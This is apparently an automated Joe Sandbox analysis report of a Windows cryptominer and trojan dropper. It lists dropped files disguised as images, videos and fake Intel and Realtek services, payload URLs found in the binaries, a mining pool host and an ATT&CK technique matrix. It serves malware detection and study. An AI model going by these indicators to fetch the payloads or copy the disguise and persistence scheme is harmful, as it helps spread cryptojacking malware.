Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_00405CBA _strcmpi,GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,LocalFileTimeToFileTime,

18_2_00405CBA

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_004023FF GetVersionExA,

18_2_004023FF

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	1 Replication Through Removable Media	121 Windows Management Instrumentation	211 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Windows Service	21 Obfuscated Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	3 Clipboard Data	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Windows Service	22 Process Injection	1 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	35 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	Network Logon Script	141 Masquerading	LSA Secrets	211 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	22 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Bootkit	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
K4gsPJGEi4.exe	100%	Avira	HEUR/AGEN.1343021
K4gsPJGEi4.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\IntelSvc.exe	100%	Avira	TR/Redcap.mzcqf
C:\ProgramData\IntelSvc.exe	100%	Avira	TR/Redcap.mzcqf
C:\ProgramData\IntelSvc.exe	100%	Avira	TR/Redcap.mzcqf
C:\Users\user\AppData\Local\Temp\RtkAudio.txt	100%	Avira	TR/CoinMiner.cywuh
C:\Users\user\AppData\Local\Temp\Start.cmd	100%	Avira	BAT/Dldr.Agent.VPC
C:\Users\user\AppData\Local\Temp\Systemfont.exe	100%	Avira	HEUR/AGEN.1320122
C:\Users\Public\RtkAudio.exe	100%	Avira	TR/CoinMiner.cywuh
C:\Users\user\AppData\Local\Temp\Systemfont.txt	100%	Avira	HEUR/AGEN.1320122
C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg	100%	Avira	TR/Redcap.mzcqf
C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	100%	Avira	TR/CoinMiner.cywuh
C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg	100%	Avira	HEUR/AGEN.1320122
C:\Users\Public\RtkAudio.exe	100%	Avira	TR/CoinMiner.cywuh
C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe	100%	Avira	TR/Redcap.mzcqf
C:\Users\Public\RtkAudio.exe	100%	Avira	TR/CoinMiner.cywuh
C:\ProgramData\IntelSvc.exe	100%	Avira	TR/Redcap.mzcqf
C:\ProgramData\screen.exe	100%	Joe Sandbox ML
C:\ProgramData\screen.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RtkAudio.txt	100%	Joe Sandbox ML
C:\Users\Public\RtkAudio.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpg	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	100%	Joe Sandbox ML
C:\Users\Public\RtkAudio.exe	100%	Joe Sandbox ML
C:\Users\Public\RtkAudio.exe	100%	Joe Sandbox ML
C:\ProgramData\IntelSvc.exe	79%	ReversingLabs	Win32.Trojan.Mamson
C:\ProgramData\cmdow.exe	39%	ReversingLabs	Win32.Hacktool.CmDow
C:\ProgramData\screen.exe	12%	ReversingLabs
C:\Users\Public\IntelSvc.exe	79%	ReversingLabs	Win32.Trojan.Mamson
C:\Users\Public\RtkAudio.exe	83%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\Public\WinRing0x64.sys	5%	ReversingLabs
C:\Users\Public\cmdow.exe	39%	ReversingLabs	Win32.Hacktool.CmDow
C:\Users\Public\screen.exe	12%	ReversingLabs
C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe	79%	ReversingLabs	Win32.Trojan.Mamson
C:\Users\user\AppData\Local\Temp\IntelSvc.exe	79%	ReversingLabs	Win32.Trojan.Mamson
C:\Users\user\AppData\Local\Temp\RtkAudio.exe	83%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\user\AppData\Local\Temp\RtkAudio.txt	83%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	47%	ReversingLabs	Win32.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\Systemfont.exe	64%	ReversingLabs	Win32.Trojan.Tiggre
C:\Users\user\AppData\Local\Temp\Systemfont.txt	64%	ReversingLabs	Win32.Trojan.Tiggre
C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exe	79%	ReversingLabs	Win32.Trojan.Mamson
C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exe	83%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	83%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg	79%	ReversingLabs	Win32.Trojan.Mamson
C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpg	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg	64%	ReversingLabs	Win32.Trojan.Tiggre
C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpg	39%	ReversingLabs	Win32.Hacktool.CmDow
C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpg	12%	ReversingLabs
C:\Users\user\AppData\Local\Temp\WinRing0x64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\WinRing0x64.txt	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\cmdow.exe	39%	ReversingLabs	Win32.Hacktool.CmDow
C:\Users\user\AppData\Local\Temp\screen.exe	12%	ReversingLabs
C:\Users\user\AppData\Local\Temp\tv_x86.exe	79%	ReversingLabs	Win32.Trojan.Mamson
C:\Windows\SysWOW64\RuntimeBroker.exe	47%	ReversingLabs	Win32.Trojan.Malgent
C:\Windows\SysWOW64\en\Au.avi	83%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\Windows\SysWOW64\en\In.avi	79%	ReversingLabs	Win32.Trojan.Mamson
C:\Windows\SysWOW64\en\Ri.avi	5%	ReversingLabs
C:\Windows\SysWOW64\en\Sy.avi	64%	ReversingLabs	Win32.Trojan.Tiggre
C:\Windows\SysWOW64\en\cm.avi	39%	ReversingLabs	Win32.Hacktool.CmDow
C:\Windows\SysWOW64\en\sc.avi	12%	ReversingLabs

Source	Detection	Scanner	Label
http://www.nirsoft.netopenIf	0%	Avira URL Cloud	safe
http://xemhang.vn/Website1/All/recoverdv.txt	0%	Avira URL Cloud	safe
http://www.commandline.co.uk.	0%	Avira URL Cloud	safe
http://xemhang.vn/Website1/All/FixT3N24.txt	0%	Avira URL Cloud	safe
http://900100.net	0%	Avira URL Cloud	safe
http://nircmd.nirsoft.net/%s.html	0%	Avira URL Cloud	safe
https://xmrig.com/wizard%s	0%	Avira URL Cloud	safe
http://sancovat.com/Website1/All/FixT3N24.txt	0%	Avira URL Cloud	safe
https://xmrig.com/docs/algorithms	0%	Avira URL Cloud	safe
http://sancovat.com/Website1/All/recoverview.txt	0%	Avira URL Cloud	safe
http://xemhang.vn/Website1/All/recoverview.txt	0%	Avira URL Cloud	safe
https://xmrig.com/benchmark/%s	0%	Avira URL Cloud	safe
http://nircmd.nirsoft.net/%s.htmlhttp://nircmd.nirsoft.net	0%	Avira URL Cloud	safe
http://www.aeroadmin.com/warning_btn_buylimit_titleback_warning_buy/index.html?src=aa_/buy.html?src=	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://ulm.aeroadmin.com/build_numberCould	0%	Avira URL Cloud	safe
http://nircmd.nirsoft.net	0%	Avira URL Cloud	safe
http://www.nirsoft.net	0%	Avira URL Cloud	safe
http://nssm.cc/h	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
auth11.aeroadmin.com	89.40.115.70	true	false		unknown
auto.c3pool.org	5.75.158.61	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nircmd.nirsoft.net/%s.html	screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://xemhang.vn/Website1/All/recoverdv.txt	K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.netopenIf	screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://xemhang.vn/Website1/All/FixT3N24.txt	K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	false	Avira URL Cloud: safe	unknown
http://sancovat.com/Website1/All/recoverview.txt	K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	false	Avira URL Cloud: safe	unknown
http://900100.net	K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	K4gsPJGEi4.exe, RtkAudio.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://sancovat.com/Website1/All/FixT3N24.txt	K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	K4gsPJGEi4.exe, RtkAudio.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://www.commandline.co.uk.	K4gsPJGEi4.exe, cmdow.exe0.15.dr, cmdow.exe.15.dr, cm.avi.15.dr, cmdo.jpg.15.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/benchmark/%s	K4gsPJGEi4.exe, RtkAudio.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://xemhang.vn/Website1/All/recoverview.txt	K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	K4gsPJGEi4.exe, RtkAudio.txt.0.dr	false	Avira URL Cloud: safe	unknown
http://nircmd.nirsoft.net/%s.htmlhttp://nircmd.nirsoft.net	screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aeroadmin.com/warning_btn_buylimit_titleback_warning_buy/index.html?src=aa_/buy.html?src=	K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	false	Avira URL Cloud: safe	unknown
http://nssm.cc/h	K4gsPJGEi4.exe, RuntimeBroker.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://ulm.aeroadmin.com/build_numberCould	K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	false	Avira URL Cloud: safe	unknown
http://nircmd.nirsoft.net	screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467765
Start date and time:	2024-07-04 18:07:53 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	53
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	K4gsPJGEi4.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	a606d29ead61ee09f59236f0c105763d1e3aba914edc30210425049ad5ce275b
Detection:	MAL
Classification:	mal100.evad.mine.winEXE@259/88@2/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 57% Number of executed functions: 8 Number of non-executed functions: 114

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.165.165.26, 173.222.108.147, 173.222.108.210, 20.3.187.198, 20.166.126.56, 88.221.110.91, 2.16.100.168
